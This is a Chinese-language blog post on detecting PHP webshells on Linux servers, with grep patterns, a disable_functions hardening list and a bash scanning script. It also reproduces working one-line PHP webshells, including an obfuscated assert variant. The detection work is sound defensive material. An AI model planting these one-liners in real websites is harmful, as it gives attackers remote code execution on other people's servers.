linux查找webshell

首先認識一下小馬，一般大馬容易暴露，駭客都會留一手，把小馬加入正常PHP文件裏面

<?php eval ($_POST[a]);?>

//密碼爲a,使用中國菜刀連接

隱藏很深的小馬

fputs(fopen(chr(46).chr(47).chr(97)……省略

解碼：

其中chr括號裏面的數字是美國信息交換標準代碼,縮寫：ASCII 可以找一份對照表對應一下

比如

46 就是 .
47 就是 /
32 就是 空格

也可以echo chr(46)解出來
1
    <?php
2
    echo chr(46).chr(47).chr(97).chr(46)
3
    ?>

WINDOWS下的應該有很多日誌分析和查殺工具（比如D盾等），那麼，LINUX下如何查找WEBSHELL呢？
1
    find /www/ -name "*.php" |xargs egrep 'assert|phpspy|c99sh|milw0rm|eval|\(gunerpress|\(base64_decoolcode|spider_bc|shell_exec|passthru|\(\$\_\POST\[|eval \(str_rot13|\.chr\(|\$\{\"\_P|eval\(\$\_R|file_put_contents\(\.\*\$\_|base64_decode'

然後就手工查看，寫入計劃任務啦。

只查小馬的可以
1
    grep -r --include=*.php  '[^a-z]eval($_POST' . > post.txt
2
    grep -r --include=*.php  '[^a-z]eval($_REQUEST' . > REQUEST.txt

查出來了，重要的是要分析日誌，查看***源頭。

防範：

禁用危險函數，整理權限，防止權限過大
1
    disable_functions = exec,scandir,shell_exec,phpinfo,eval,passthru,system,chroot,chgrp,chown,proc_open,proc_get_status,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket

在網上找了一份用PHP查找WEBSHELL的東東，適用數據量小及少

https://github.com/emposha/PHP-Shell-Detector

git 下來 只需要2個文件

shelldetect.php //默認帳號密碼 admin protect

shelldetect.db

如果你有什麼好的建議，感謝你的分享：）

20130826更新

小馬的變種很多，經常會繞過我們的檢查，此時，最好能做把文件進行對比。

比如，網上找的這個PHP一句話
1
    <?php $k="ass"."ert";$k(${"_PO"."ST"}['8']);?>

下面提供自己寫的比較簡單的檢查腳本，思路是對比目錄有更新的PHP文件進行匹配。
01
    #!/bin/bash
02
    # 先RSYNC乾淨的，再執行此腳本最好
03
    Date=`date +%Y%m%d_%H:%M`
04
    src=/www/www.a.com/
05
    dest=/www/www.a.com.bk/
06
    log_tmp1=/root/sh/webshell_php.log
07
    log_result=/root/sh/webshell_result.log
08
    which egrep
09
    if [ $? -ne 0 ];then
10
    echo "Not Found egrep,exit"
11
    exit 0
12
    fi
13
    rsync -av --include="*/" --include="*.php" --exclude="*" $src $dest|grep -i php > $log_tmp1
14
    for diff in `cat $log_tmp1`
15
      do
16
         egrep 'assert|phpspy|c99sh|milw0rm|eval|\(gunerpress|\(base64_decoolcode|spider_bc|shell_exec|passthru|\(\$\_\POST\[|eval \(str_rot13|\.chr\(|\$\{\"\_P|eval\(\$\_R|file_put_contents\(\.\*\$\_|base64_decode|\@preg_replace' "$dest""$diff"
17
      if [ $? -eq 0 ];then
18
         echo "===========================" >> $log_result
19
         echo "$Date" >> $log_result
20
         echo "$dest$diff is Dangerous" >> $log_result
21
       fi
22
    done

原文地址：http://my.oschina.net/longquan/blog/155905